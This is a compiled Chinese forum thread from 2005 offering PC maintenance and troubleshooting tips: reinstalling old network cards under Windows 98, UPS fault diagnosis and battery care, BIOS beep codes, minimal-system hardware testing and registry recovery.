l　　　 关闭电脑，拔掉电源插头，再把网卡从电脑上拔下。重新开机，当Windows 98装入时，按[ESC]跳过网络登录屏。启动完成后在 “控制面板” 双击“系统”图标。在系统属性页，选择“设备管理器”选项卡。在“网络适配器”部分，点击其边上的“+”号展开。选择与有问题的网卡相关的设备（或者所有除拨号适配器以外的设备），再点“删除”按钮。点“确定”几次关闭“设备管理器”。重启电脑后查看确认所有与网卡相关的文件已被删除。
l　　　 下面来仔细看看拔下的网卡，并要把一些重要的信息记下来。首先，对初学者来说，要记下网卡的制造商和型号信息。制造日期也很重要，因为从制造日期上往往就能知道网卡的类型。还应该看看该卡为何种架构，是ISA、EISA、PCI、VLB还是Micro Channel？最后，看看卡上有没有跳线。如果有，则画下卡的草图并标出跳线的位置。通常，在网卡的底部会有蚀刻的文字，标明跳线的功能。如果有，记下来。如果卡上有跳线，但却找不到相关的文字，检查装网卡的盒子看有没有网卡的使用手册。有了这些信息后，就可以开始了。

2、更换新的驱动程序
  知道了网卡的信息后，就可以下载最新的驱动程序了。比较老的网卡往往只有DOS和Windows 3.1的驱动程序，当然运气好的时候也能找到Windows 95的驱动程序。因为新的驱动程序几乎肯定能工作得更好，所以花时间寻找还是值得的。可以到制造商的网站的驱动程序下载页，搜索该网卡的型号。

3、何时需要添置新网卡
有时把旧电脑连到网络上实在费劲，好像怎么办都不行，还不如去买一张新卡。这并不是说拔下来的卡就一定不能连上网络，而是用这种卡太费事，买一张新卡又很便宜，不值得。如果发现老卡符合以下的特征，干脆去买一张吧：
l　　　 网卡制造商不存在，或没有网址，或者这两种条件都符合。
l　　　 网卡上使用跳线，但却找不到与跳线功能相关的任何文档。
l　　　 网卡是EISA或Micro Channel架构的，但却找不到配置文件。
l　　　 找不到该网卡的Windows 9x驱动程序。

4、网卡能很好地支持即插即用吗？
  下一步要检查该网卡支不支持即插即用。如果是PCI网卡，那应该没问题。虽然一些ISA的网卡能支持即插即用，但毕竟只是少数。网卡是否支持即插即用对网卡的配置影响很大。下面先讲述如何配置不同类型的网卡，然后再讲几个适用于所有类型网卡的技巧。
即插即用网卡
  即插即用网卡的配置很简单。把网卡插入电脑中启动Windows，Windows会检测到该卡并要求提供驱动程序，安装完驱动后重启计算机。只需再配置一下其他的网络选项，如默认的协议和客户端等。
l　　　 首先，列出网卡所有可用的资源选项。然后，打开“控制面板”，双击“系统”图标。出现“系统属性”页后，选择“设备管理器”，再双击“计算机”，这样将能看到系统中被占用的资源。一般每个中断号都会被某个设备占用，但其实不是每个设备都需要。比如，通常可以禁用COM1或COM2，并把他们占用的中断（中断3或中断4）给网卡使用。中断7一般被打印机占用，但如果使用的是网络打印机，就可以让网卡使用中断7。图A显示了“设备管理器”中列出的资源占用情况。
l　　　 给网卡分配了中断号后，选择“输入/输出”单选按钮，按以上的方法给网卡设置内存输入/输出范围。有些网卡需要一个基址，选择“内存”单选按钮，找到符合要求的基址分配给网卡即可。
l　　　 确定了网卡要使用的设置后，用跳线把网卡配置成与该设置相符。然后，关机，拔掉电源插头，再插上网卡。系统重启时有可能检测网卡，如果检测网卡的话，就大功告成了。如果没有，必须用“控制面板”中的“添加新硬件”来检测网卡并安装驱动程序。
l　　　 如果用“添加新硬件”向导来安装网卡，Windows往往会分配该卡不正确的资源。在重启计算机之前，到“设备管理器”中找到网卡，右击后选择“属性”，出现该卡的属性页后，选择“资源”选项卡，会看到Windows 98为该卡分配的资源。因为资源不正确，故必须清空“使用自动的设置”复选框，选中要修改的资源并点击“改变设置”，最后把资源修改成与网卡的设置相同。把某些资源让出来给网卡后，有可能要用同样的方法给系统中的其他设备改变资源。
5、如果网卡仍然不能工作
如果试了上面的方法后，网卡还不能工作，那就只好去买一张新卡了。现在的网卡非常便宜，买来的卡不但硬件新，还有专门的Windows 98 的驱动程序

九、　 UPS简易故障排除
1.　 为什么我的UPS无法开机？
1)　　 开机的时间少于3秒,请重新按住ON/OFF开关键3秒钟并听到嘟一声即可完成开机手续。
2)　　 电瓶损坏,请即刻更换电瓶.
3)　　 若已覆上述动作数次仍无法开机, UPS可能有故障,请即连络代理商之客服组人员。

2.　 为什么UPS "FAULT" LED灯亮,蜂鸣器长鸣？
  请检查负载是否短路或者过大,是,请将其设备拨除或是减轻部份设备负载,若UPS仍持续长鸣,请即通知代理商或本公司之客服组人员。

3.　 为什么我的UPS开机后,UPS提示Back up灯号?
1)　　 请先用其他电器设备测试AC电源有无电源供应或电源插座是否过松道致接触不良。
2)　　 请检查背面板之无熔丝开关(Breaker)按钮有无弹出跳脱或是Fuse是否已溶断。
3)　　 若以上此情况经确认后仍无法改善，请即通知代理商或本公司之专业客服人员。

4.　 为什么我的UPS开机后，UPS的显示灯全亮？
  请再重新开机，并请再次确认，若情况仍无法改善，请即通知代理商或本公司之专业客服人员。

5.　 为什么停电时，我的UPS放电时间不足？
1)　　 UPS在正常状态下，以80~95%的负载最为合理，若负载超这100%以上，则电池放电时间会因此而缩短，请减轻一些负载。
2)　　 可能是电池电压未完全充饱，请再充电8小時或更久。
3)　　 电池若时常充放电或操作于高温环境下，会造成电池寿命减短。因此建议您UPS电池使用两年以上，即使更换电池灯信号未显示，也请更换新电池，并将UPS远离高温的环境，避免电池寿命再次减短以维持UPS正常运作。
4)　　 可能因电池老旧，请和代理商购买新电池，以维持UPS的正常运作。
5)　　 以上之任一项皆已改善后，情况仍无法改善，请即通知代理商或本公司之客服组人员。

6.　 为什么我的电脑无法与UPS连接？
1)　　 请将软件再设定一次。
2)　　 请将UPS的RS232连接线与电脑的COM1/COM2再连接一次，并确定设定值。
3)　　 若无法解決，请即通知代理商或本公司之专业客服人员。

7.　 UPS的"故障"LED灯亮起, 蜂鸣器间隔发出"嘟"声？
UPS內部充电器故障，请关闭UPS再通知代理商之客服部人员。
1） 电池是UPS设备中造价最贵的元件之一，使用和维护不当时易损坏。所以正确的使用和维护尤为重要。
l　　　 定期(6个月左右)检查UPS电源内电池组中各单个电池的端电压，若单个电池间端电压超过1V以上时就需进行维护(用均衡衡压限流0.5CA充电或更换电池)。
l　　　 蓄电池(组)一般应在0℃-30℃的环境中使用，温度过高蓄电池的寿命将大大缩短，温度过低，蓄电池实际可释放的容量将大大减少。电池可供使用的容量与环境温度密切相关。
2） 在UPS电源前加装交流稳压器可大大改善市电的“品质”，在加装时请注意以下问题：
l　　　 ⑴不宜在用继电器作为市电旁路供电和逆变器供电转换的UPS电源(如后备式)前增添带有大电感元件或输出波形失真度大的交流稳压器，否则会造成转换时间过长。
l　　　 ⑵对于以静态开关作为转换元件的UPS电源，在其前面增添交流稳压器、参数稳压器等具有抗干扰性能好，波形失真小的交流稳压器则可以明显改善UPS电源的工作特性并提高UPS的可靠性。
3） 长延时UPS电源使用时注意以下几个问题：
l　　　 配置长延时电池时，在UPS电源的逆变器的直流电源的输入回路中设置适当的“反灌噪音”抑制装置，这样可以提高UPS的可靠性。
l　　　 用户需在长延时UPS机器外接充电器时，应选用具有恒流和恒压控制功能的充电器。
l　　　 当UPS电源处于电池模式供电时，电池放电流不宜过小(即负载不宜过轻，放电流应不小于0.05CA)。
4） 正确理解UPS电源过流保护功能。
l　　　 UPS电源中，常用以下方法进行过流保护：分别在UPS电源的交流输入端和电池输出端安装过流保护器来进行过流保护。在UPS控制电路中设计输出过流和短路自动保护电路出现过流时，UPS将关闭输出

--------------------------------------------------------------------------------
作者: 山东腾飞科技　　时间: 2005-9-5 15:42　　 标题: 计算机硬件维护知识

一、由于一些疏忽造成的假故障
所谓的假故障其实并不是真正意义上的故障，而是由于用户自己的疏忽或者不小心而造成的故障，所以在当计算机看起来出现故障的时候，不妨先按下面的顺序来检查一下：
1）是否将电源插头接好，或者插头是否有松动，有的电源背后有一个小开关，也要注意一下是否开关打开。
2）机箱背后的各个插口是否都插紧到位，因为如果显示器的插口没有插好就可能早成显示器无显示，音箱的和声卡直接的接口松动就可能造成计算机发出的声音不正常甚至是没有声音。
3）一些容易混淆的接口，如PS/2鼠标和键盘、MODEM的进线和出线之间，这些情况最容易发生在移动过计算机的位置后，因为这些接口的外观是一样的，所以很容易被插错。
4）检查接线板是否有问题，现在有的廉价接线板的质量比较差，往往会有接触不良的情况发生，所以当计算机的POWER键按下去，但没有任何反应的时候，不妨先检查一下。

--　电脑硬件故障及排除方法
◎系统故障的判断
>>>>1、开机后是否有“嘀”的一声。2、开机后是否有显示，显示是否正常。3、自检是否正常顺利完成。4、硬盘引导是否成功。5、软驱读写是否正常。6、光驱的读（或写）是否正常。7、键盘、鼠标是否能正常操作。8、音箱是否能正常发声。9、常用软件能否正常使用。10、是否可以上网。11、是否经常死机或重启。
>>>>◎主板的故障分析
>>>>1、主板工作电压:＋－5V、＋－12、3.3V。2、CPU：烧坏，引脚与插槽接触不良，风扇不转，超频失败。3、内存条：扩展槽与内存条接触不良，烧坏，质量太差，超频失败，安装位置不对。4、芯片组：内部烧坏，相应的驱动程序未安装成功。5、复位，时钟，准备好信号不正常。6、ROM：烧坏，升级失败，病毒攻击。7、IDE口：软驱口：接触不良，口被屏蔽。8、键盘鼠标：接口或接口芯片损坏，接口保险电阻烧坏。9、显示接口：集成显示卡接触不良或接口芯片坏。10、BIOS设置失败或电池失效。11、I/O扩展槽：接触不良，内部有适中或位置不当。12、其它接口：USB，串并行，声，网卡口等口有问题。
>>>>◎开机无声无显示
>>>>1、主板上无工作电压。2、CPU有问题。3、内存条芯片组有问题。4、复位、时钟、准备好信号有问题。5、ROM有问题。6、I/O接口有问题。
>>>>◎无法检测到硬盘或不能引导
>>>>1、BIOS设置中硬盘的参数设成空的。2、IDE口被屏蔽。3、IDE口损坏。
>>>>◎软驱不能读写
>>>>1、BIOS设置中软驱的参数设成空的。2、软驱口被屏蔽。3、软驱损坏。（若只不能写：就是设成只读。）
>>>>◎灰尘引起的软驱故障
>>>>1、能读写但不能格式化。原因是没有索引信号民。2、“写保护”错误。3、“没有准备好”错误。4、“目录滞留”现象。原因是没有盘片更换。
>>>>◎软驱不能读写、灯不亮、无读盘声音
>>>>1、BIOS设置中软驱类型不对或软驱口关闭。2、软驱电源线不良。3、信号线接触不良。4、软驱本身损坏。
>>>>◎软驱不能引导
>>>>1、在BIOS设置中软驱类型不对或引导顺序中无软驱。2、信号线的B口接在软驱上，但A与B交换设成Disable。3、没有接电源线。4、主板上软驱口被关闭。5、软驱本身损坏。
>>>>◎软驱涌读写，灯亮后熄灭
>>>>1、软驱磁头组件损坏或磁头脏。2、软驱机械部件损坏或磁头偏。3、软驱信号线接触不良或控制电路坏。
>>>>◎发出一长两（八）短、无显示（黑屏）
>>>>1、内存条和主板接触不良。2、内存条损坏。3、内存条质量差或超频。
>>>>◎硬盘不能引导
>>>>1、CMOS设置中逻辑格式化参数设置错误。2、CMOS设置中引导顺序无硬盘。3、CMOS设置中IDE口被屏蔽或损坏。4、硬盘的电源线或数据有错或接触不良。5、硬盘本身有物理损坏或控制电路损坏。
>>>>◎硬盘引导失败
>>>>1、MBR、DBR、FAT、FDT被破坏。2、无系统文件或文件损坏。3、其它启动文件损坏。4、病毒干扰。5、硬盘逻辑扇区损坏（一般批零扇区）。
>>>>◎系统启动时间过长
>>>>1、在Config、sys和Autoexec.bat中有较耗时的DOS程序命令（杀毒程序)。2、安装了网卡、声卡、光驱等硬件。3、启动时光驱中有光盘。
>>>>◎只能进入安全模式
>>>>1、病毒干扰。2、内存、显卡、硬盘等硬件质量不好。3、安装了某些不兼容或有问题的驱动程序。
>>>>◎启动后出现兰屏
>>>>1、驱动程序版本不一致(有些是压缩的)。2、CPU内有超频失败。

硬件故障的检测方法>>>>下面我们来看一看硬件故障的基本测试方法。显示器没有任何图像出现时可以使用下面的方法测试出故障的部件。
>>>>一、首先准备一个工作台。
>>>>二、将主板从机箱拔出,再把主板上的所有部件拔出,只留下CPU和RAM.然后把主板放到工作台上。
>>>>三、将稳压电源连接在主板上。
>>>>四、将显卡插入AGP插槽。当然如果是PCI显卡则插入PCI插槽中。插入时要注意将显卡镀金的部分完全地插入插槽中。
>>>>五、连接显示器电源插口后将显卡与显示器连接起来。
>>>>六、打开显示器电源,再接通机箱电源开关。然后用金属棒接触主板的电源开关。
>>>>主板的电源开关是与机箱电源开关连接的部分,一般标记为“PWR SW”或“POWER SE”。
>>>>七、如果画面上出现BIOS的版本信息,画面没有异常的话,说明CPU,主板,RAM,显卡,电源都正常.通常,经常易出现故障的部件是“显卡”,“主板”,“硬盘”这个顺序。
>>>>八、然后连接硬盘和软区进行检测。接着连接CD－ROM检测,然后是声卡。Modem等一个一个的连接进行检测。如果不出现画面就说明后连接的那个部件有故障或是有兼容性问题。只须处理那个出故障的部件即可。
>>>>九、机箱的问题
>>>>有时将主板安装到机箱时发生问题,导致启动失败。因此如果在上面的部件检查中没有任何问题的话,可以将主板安装到机箱上测试。如果在测试中没有任何的错误,则说明是CMOS Setup错误,驱动程序等的软件问题。

检测电脑故障的简单方法>>>>如果排除了“假故障”，那么就是真的有故障存在了！若再检测一下各配件的外观，包括打开机箱看到主机内部的各部件表面都没有被高电压击毁的迹象，或者明显的伤痕，若有的话，故障部件就清楚了。若都没有，可先试下面的处理方法。
>>>>1.清除尘埃
>>>>飘浮在空气中的尘埃是计算机一大杀手，使用一段后就可能因主板等关键部件积尘太多而出现故障，即便是在专用机房中也会如此。所以，对于使用了较长时间的计算机，应首先进行清洁，用毛刷轻轻刷去主板、外设上的灰尘。如果灰尘已清扫掉，或无灰尘，故障仍然存在，就表明硬件存在别的问题。
>>>>另外，由于板卡上一些插卡或芯片采用插脚形式，震动、灰尘等原因常会造成引脚氧化，接触不良。可用橡皮擦擦去表面氧化层，重新插接好后开机检查故障是否排除。
>>>>随便说一句，键盘使用日久往往会出现漏电、按键卡死等故障，此故障应及时处理，否则在输入文件时将会键入一些错误的字符。处理时应把键盘用一个托架托起来，按键向下，打开键盘的后盖，用酒精清洗线路板及按键的触点，并把卡死的按键下面的弹片适当撬起，使之恢复原有的弹性。
>>>>注意：软盘使用中，脏污或被划伤的软盘插入软驱时会划伤读写头，损坏软驱。清洗磁头时一定要十分谨慎，长时间不用的软驱，可能在磁头上会有锈蚀，此时不可使用清洗盘，具体做法是打开机箱将清洗剂滴在磁头上，浸泡半小时后，用脱脂棉小心地擦拭干净。如果盲目地使用清洗盘势必导致软驱读写头的损伤，使软驱报废。
2.看、听、闻、摸
>>>>“看”即观察系统板卡的插头、插座是否歪斜，电阻、电容引脚是否相碰，表面是否有烧焦痕迹，芯片表面是否开裂，主板上的铜箔是否烧断。当然了，不用说您也知道还要查看是否有异物掉进主板的元器件之间(这将造成短路)，也可以看看板上是否有烧焦变色的地方，印刷电路板上的走线(铜箔)是否断裂等等。
>>>>“听”即监听电源风扇、软/硬盘电机或寻道机构、显示器变压器等设备的工作声音是否正常。另外，系统发生短路故障时常常伴随着异常声响，监听可以及时发现一些事故隐患和在事故发生前即时采取措施。
>>>>“闻”即辨闻主机、板卡中是否有烧焦的气味，便于发现故障和确定短路所在地。
>>>>“摸”即用手按压管座的活动芯片，看芯片是否松动或接触不良。另外，在系统运行时用手触摸或靠近CPU、显示器、硬盘等设备的外壳根据其温度可以判断设备运行是否正常；用手触摸一些芯片的表面，如果发烫，则为该芯片损坏。
>>>>3.拔插检测
>>>>前面说过，计算机产生故障的原因很多，主板自身故障、I/O总线故障、各种插卡故障均可导致系统运行不正常。采用拔插维修法是确定故障发生在主板或I/O设备的简捷方法。该方法就是关机后，将插件板逐块拔出，每拔出一块板就开机观察机器运行状态，一旦拔出某块后主板运行正常，那么故障原因就是该插件板故障或相应I/O总线插槽及负载电路故障。若拔出所有插件板后系统启动仍不正常，则故障很可能就在主板上。
>>>>拔插检测时，还能从另一个方面排除计算机故障：一些芯片、板卡与插槽接触不良，将这些芯片、板卡拔出后在重新正确插入可以解决因安装接触不当引起的微机部件故障。
>>>>4.交换检测
>>>>将同型号插件板，总线方式一致、功能相同的插件板或同型号芯片相互交换，根据故障现象的变化情况也可判断故障所在。此法多用于易拔插的维修环境，例如内存自检出错，可交换相同的内存芯片或内存条来判断故障部位，无故障芯片之间进行交换，故障现象依旧，若交换后故障现象变化，则说明交换的芯片中有一块是坏的，可进一步通过逐块交换而确定部位。如果能找到相同型号的微机部件或外设，使用交换法可以快速判定是否是元件本身的质量问题。
5.比较检测
>>>>运行两台或多台相同或类型相差不大的计算机，根据正常计算机与故障微机在执行相同操作时的不同表现可以初步判断故障产生的部位。
>>>>6.振动敲击检测
>>>>用手指轻轻敲击机箱外壳，若故障排除了，说明故障是由接触不良或虚焊造成的。然后，可进一步检查故障点的位置并排除之，只是此类故障难以检测到确切的部位。
>>>>7.升温降温检测
>>>>人为升高微机运行环境的温度，可以检验各部件，尤其是CPU的耐高温情况，因而及早发现事故隐患。降低运行环境的温度后，如果故障出现率大为减少，说明故障出在高温或不能耐高温的部件中，此举可以帮助缩小故障诊断范围。
>>>>事实上，升温降温法是采用的是故障促发原理，以制造故障出现的条件来促使故障频繁出现以观察和判断故障所在的位置，只是具体实施时要注意控制好加热方法，温度也不可超过摄氏40度。
>>>>8.运行检测程序
>>>>随着各种集成电路的广泛应用，焊接工艺越来越复杂，仅靠一般的维修手段往往很难找出故障所在，而通过随机诊断程序、专用维修诊断卡及根据各种技术参数(如接口地址)，自编专用诊断程序来辅助检测，往往可以收到事半功倍的效果。程序测试的原理就是用软件发送数据、命令，通过读线路状态及某个芯片(如寄存器)状态来识别故障部位。此法往往用于检查各种接口电路故障及具有地址参数的各种电路，但应用的前提是CPU及总线基本运行正常，能够运行有关诊断软件，能够运行安装于I/O总线插槽上的诊断卡等。
>>>>选择时诊断程序时要严格、全面、有针对性，能够让某些关键部位出现有规律的信号，能够对偶发故障进行反复测试，并能显示出错记录。
[ Last edited by 帅气十足也 on 2005-2-17 at 08:40 ]

如何诊断电脑故障如何诊断电脑故障
>>>>很多初学者刚接触电脑时都有一种恐惧感，认为电脑的故障一定是难以逾越的大问题。其实，多数电脑故障都有一定的规律可循，这方面的问题就好像是一层窗户纸，一捅就破，并不需要你具备太多电脑方面的知识。下面就让我们一起来学几招诊断电脑故障的快捷方法。
>>>>环境检查法
>>>>对于一些突如其来的硬件故障，如开机无显示等。我们先不要进行深入的考虑，因为往往我们会忽略一些细节问题。首先我们应该看看那些显而易见的东西：如有没有接通电源？开关是否已打开？电源插座有没有通电？是不是所有的接线都连接上了？或许问题的根源就在其中。
>>>>CMOS还原法
>>>>有些用户往往会因为好奇而改动主板CMOS里的一些设置，而这恰恰是导致故障发生的一个主要原因。如果电脑故障因此而起，那么我们可以通过还原CMOS的设置来解决问题。方法非常的简单，开机后按下键盘上的“Delete”键进入主板的CMOS，选择其中的“Load Optimized Defaults”（载入缺省设置），按“Y”键确认，保存退出CMOS即可。
>>>>注册表恢复法
>>>>有些用户喜欢通过修改注册表来达到对系统的优化设置或进行个性化设置，也有的用户在上网浏览时被恶意程序改动了注册表，一些故障就是因为对注册表不正常的更改而造成的。这时我们可以重新启动计算机，并切换到MS-DOS方式下，在C盘根目录下输入并执行“scanreg/restore”进入注册表恢复界面，然后选择一个电脑完好时的注册表文件，进行“Restore（还原）”，即可实现对注册表的恢复。
>>>>精简启动法
>>>>部分计算机故障是在我们安装一些软件后出现的，如果此时计算机还可以进入操作系统，那么我们可以在开始菜单中，运行“msconfig”程序，关闭启动菜单里除“internat.exe、Scanregistry、Systemtray”之外的所有程序。重新启动计算机后如果故障不再出现，那么问题多半是由某个自启动的软件造成的。
logged跟踪法
>>>>如果计算机已无法进入到Windows中或进入后不正常，那么我们可以采用Logged（\Bootlog.txt）的方式启动计算机，这样所生成的Bootlog.txt文件能够记录下故障出现的位置。使用Logged方式启动的方法是，在系统启动时按下键盘上的F8键，会出现启动菜单，选择以Logged方式启动，故障出现后，用Windows启动盘重新启动计算机，然后将C盘根目录下的Bootlog.txt文件复制到软盘上，在其他计算机上打开该文件，你会发现上面记录了Windows启动的整个过程，从中可以找到问题的根源。
>>>>设备替换法
>>>>所谓设备替换，就是当你怀疑哪个设备有问题时，用同样功能（最好是同一型号）的设备替换它，如果替换后问题消失了，那么多半就是这个设备出现了问题。
>>>>最小系统法
>>>>如果你不能确定是哪个硬件出现了问题，可以使用最小系统法来判断。最小系统法就是去掉系统中的其他硬件设备，只保留主板、内存、显卡三个最基本的部件，然后开机观察是否还有故障。如果有，则可排除其他硬件的问题，故障应来自于现有的三个硬件中。如果没有，则将其他硬件一一添加，查看在添加哪个硬件后出现故障，发现故障所在后，再针对这个硬件进行处理即可。
>>>>程序升级法
>>>>很多人对驱动程序重视不够，认为随便装一个就可以了。但是，我们在购买硬件时已经有了驱动程序，为什么硬件厂商还要不停地发布新版本的驱动程序呢？其实，这样做的目的就是为了让厂商自己的产品更加的完善。
>>>>由于现在的硬件更新速度很快，而且大多数硬件厂商的硬件研发先于软件研发，因此与硬件配套的驱动程序在刚发布时可能会存在一些小Bug，需要通过不断更新驱动程序来弥补这些缺陷。因此，升级驱动程序也是解决硬件故障的一项有效方法。
>>>>软件测试法
>>>>诊断硬件故障通常需要了解一些硬件方面的信息，但很多人没有记录硬件信息的习惯或不知该怎样记录。计算机出现故障后，可能会无法进入系统，这时候我们就需要一个在DOS下测试硬件的工具，如HwInfo for DOS，它的大小只有582KB，放在软盘里可以随身携带，借助于它就可以随时诊断硬件故障了。
>>>>更改资源法
>>>>很多计算机故障都是由硬件间的资源冲突引起的，对此我们可以采用更改资源的方法来解决。用鼠标右键点击“我的电脑”，在下拉菜单中选择“属性”一项，点击“设备管理器”，选择“按类型查看设备”，如果在列表中发现有设备被黄色的惊叹号标出，那么很可能是硬件间有了资源冲突。更改资源的方法是，用鼠标左键双击标有惊叹号的硬件,选择“资源”一项，去除“使用自动的设置”前的选勾，选择“更改设置”，将冲突的资源更改即可。
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
--　计算机故障排除
排除计算机故障需要对计算机有一个整体的认识，属于一门综合的知识。如对计算机各部件作用及计算机启动过程有一定认识的话，排除故障就很简单了。
计算机故障分硬件故障和软件故障两种
无论哪种故障都会有一定的现象，我们主要根据这些现象来排除故障。
一、硬件故障，在现实过程中主要有以下几种情况：
1、 屏幕上无显示、喇叭无声音
出现这种情况原因很多，除一些特殊情况外，基本是硬件本身的原因即：电源、主板、CPU等硬件所造成的。
2、 屏幕上无显示、喇叭有声音
出现这种情况可依据BIOS 报警声来判断故障所在。
Award BIOS
>>>>1短：系统正常启动。
>>>>不断地响（长声）：内存条未插紧或损坏。
>>>>不停地响：电源、显示器未和显示卡连接好。
>>
>>>>AMI BIOS
>>>>8短：显示内存错误。显示内存有问题，更换显卡试试。
>>>>1长3短：内存错误。
>>>>1长8短：显示器数据线没插好或显示卡没插牢。
3、 屏幕上有显示，但没有完成自检
这种情况多数是存储设备有问题或没有连接对所造成的
二、软件故障，主要是硬盘上的数据出现问题
这种情况比较复杂，在众多的故障中，软件故障是最难排除的。
DOS启动故障、WINDOWS启动故障。
1、DOS成功启动六大要素：
①物理连线
②CMOS 硬盘参数
③主引导扇区（包括主引导记录和硬盘分区表）
④主DOS 引导记录
⑤文件分配表
⑥三个启动文件。
Windows启动时需要Command.com，Io.sys，Msdos.sys，三个文件，在初始化过程中还要读取Autoexec.bat，Config.sys，System.ini，Win.ini，User.dat，System.dat六个文件。
当执行Io.sys和Msdos.sys两个文件，此时屏幕上会出现“Starting Windowsn98……”的信息
2、WINDOWS启动
WINDOWS启动过程是非常复杂，是微软公司的核心秘密。
WIN 9X主要是根据系统配置文件调用各类程序，保证系统正常运行的。
系统的核心配置文件主要有4个，即：WIN.INI、SYSTEM.INI、SYSTEM.DAT、USER.DAT。
①.注册表及其备份与恢复
什么是注册表？
注册表是 Windows 的核心。其中存放着各种参数，直接控制着Windows的启动、硬件驱动程序的装载以及一些Windows应用程序的运行。
注册表文件
System.dat和User.dat中。它们是二进制文件，不能用文本编辑器打开查看。它们存于Windows目录下，具有隐含、系统和只读属性。。

注册表编辑器——regedit

注册表的备份与恢复
注册表备份：1.直接进行备份与恢复
2.注册表编辑器的导出与引入，用 Regedit.exe，的“导出”及“引入”功能
3.系统的注册表自动备份，以*.cab存放在C:\\Windows\\Sysbckup\\路径下。
注册表恢复：启动系统到DOS下，运行SCANREG /RESTORE
执行“regedit /c *.reg”命令重新建立注册表
导入之前请事先运行smartdrv.exe命令，否则需要的时间将会相当之长。另外，/c参数可是一个危险选项，它会导入指定注册表文件的全部内容，重新创建一个完整的注册表，因此在导入之前请事先备份好当前注册表文件。
②. 恢复丢失的文件
WINDOWS下运行系统文件检查器“SFC”
DOS下运行EXT.EXE；EXTRACT.EXE
使用EXTRACT/Y EBD.CAB EXT.EXE命令将EXT.EXE从EBD.CAB解压出来
使用EXTRACT/D>>F:\\Win9x\\WIN_*.CAB命令检查CAB包中有哪些文件。
③、Windows蓝屏错误
同时运行了多个比较大型的程序，而系统内存又比较少，这时系统可能会出现提示“Windows is busy”(系统忙)错误的蓝屏信息
运行了一些有缺陷的程序，可能会出现Windows发生(致命)错误的蓝屏信息，并且还会指出某某文件在某个地址发生错误。
硬件不兼容或损坏引起运算错误也会导致蓝屏错误，特别是内存
超频引起蓝屏错误。
系统过热。
在系统从软盘、光盘读取数据的过程中将软盘取走或将光驱的门打开
④、死机
CPU过热；硬件不兼容（显卡、内存）；程序有缺陷。
⑤、病毒
硬盘的数据结构
[ Last edited by 帅气十足也 on 2005-2-17 at 08:49 ]

故障及对策故障及对策
>>>>如果想对电脑故障做全面的分析,那恐怕要写一本书,且那也并非易事。关于软件的故障在各类报刊上介绍过很多,因此这里只介绍硬件故障的症状,原因以及解决方法。
>>>>一、电脑启动过程
>>>>Ⅰ、首先来了解一下电脑的启动过程
>>>>1、贮存在ROM(只读存储器)中的Bootstrap Loader程序和自诊断程序移动到RAM(随机存储器)中。
>>>>2、随着Bootstrap Loader的运行,储存在辅助记忆装置中的操作系统将系统文件送到RAM中。
>>>>3、执行系统文件Io.sys和Msdos.sys。这时画面上出现“Starting Windowsn98……”的信息。
>>>>4、若有Config.sys则执行它。
>>>>5、执行系统文件的Command.com文件。
>>>>6、若有Autoexec.bat则执行它。
>>>>7、读取Windows的初始化文件“System.ini”和“Win.ini”,再读取注册表文件。
>>>>8、启动结束,出现初始画面,运行操作系统。
>>>>这个过程中,在主板的ROM BIOS中监测硬件是否异常，包括硬件故障,接线情况,各类卡的安装等。如果发生错误，画面上什么也不出现,启动停止。这种情况下很可能是硬件故障。
Ⅱ、系统启动顺序
>>>>1、PC电源的ON——显示器，键盘，机箱上的灯闪烁。
>>>>2、检测显卡——画面上出现短暂的显卡信息。
>>>>3、检测内存——随着嘟嘟的声音画面上出现内存的容量信息。
>>>>4、执行BIOS——画面上出现简略的BIOS信息。
>>>>5、检测其他设备——出现其他设备的信息(CPU,HDD,MEM...)。
>>>>6、执行OS(操作系统)的初始化文件－Starting Windows 98等。
>>>>Ⅲ、在启动时主板中发出声音,通过这个声音可以判断是何种错误
>>>>根据主板形式的不同,声音的表示也有所不同.
>>>>AMI BIOS:
>>>>1短:内存刷新失败
>>>>2短:内存校验错误
>>>>3短:基本内存错误
>>>>4短:系统时钟错误
>>>>5短:CPU错误
>>>>6短:键盘错误
>>>>7短:实模式错误
>>>>8短:内存显示错误
>>>>9短：ROM BIOS校验错误
>>>>1长3短:内存错误
>>>>AWARD BIOS:
>>>>1短:启动正常
>>>>2短:非致命错误
>>>>1长1短:显示错误
>>>>1长2短:键盘错误
>>>>其他BIOS可查阅相关资料,这里不再详细介绍。
----------------------------------------------------------------------------------------------------------------------------------------------------------------
--　计算机故障排除方法
计算机故障排除方法
遭遇停电
>>>>现象：显示器，主机，音箱等会在一瞬间“强行关闭”。
>>>>现象分析：这是突然“停电”造成的。由停电的瞬间产生的电压波动会冲击电脑硬件的芯片，电路，电阻等。而一旦停电时您正在进行磁盘读写操作，则有可能产生坏道，或当你在编写文稿时，则数据资料就会丢失……
>>>>应当之策：配电脑时选配个品牌电源，这样能最大限度的从电源上减小电压波动对硬件造成的不良影响。停电后，关闭所有电源，以防下次来电时显示器和部份ＡＴＸ电源同时启动，这样会造成对硬件的不良损害。当您用WORD编辑文稿时，用上WORD的自动保存功能。如果停电的瞬间恰好您在对磁盘进行操作，建议您下次开机不要在启动时跳过磁盘检测，检测有无产生坏道。一旦发现坏道，则用NORTON，PQMAGIC等工具软件来修复或屏蔽坏道。另外，如果您经济上许可，建议选配一个UPS，为电脑提供一段时间的断电保护。
自动关机
>>>>现象：电脑在正常运行过程中，突然自动关闭系统或重启系统。
>>>>现象分析：现今的主板对CPU有温度监控功能，一旦CPU温度过高，超过了主板BIOS中所设定的温度，主板就会自动切断电源，以保护相关硬件。另一方面，系统中的电源管理和病毒软件也会导致这种现象发生。
>>>>应当之策：上述突然关机现象如果一直发生，先确认CPU的散热是否正常。开机箱目测风扇叶片是否工作正常，再进入BIOS选项看风扇的转速和CPU的工作温度。发现是风扇的问题，就对风扇进行相关的除尘维护或更换质量更好的风扇。如果排除硬件的原因，进入系统，从“吻到死”的安装光盘中覆盖安装电源管理，再彻底查杀病毒。当这些因素都排除时，故障的起因就可能是电源老化或损坏，这可以通过替换电源法来确认，电源坏掉就换个新的，切不可继续使用，会烧毁硬件的。
系统当机
>>>>现象：桌面被锁定，鼠标不能动，严重时连热启动（ALT+CTRL+DEL）都不行。还有就是蓝屏现象。
>>>>现象分析：“吻到死”系统自身的BUG以及各软件间的兼容性问题是该故障的原因，也可能是用户同一时间运行了过多的大程序，从而导致进程阻塞，引发当机。
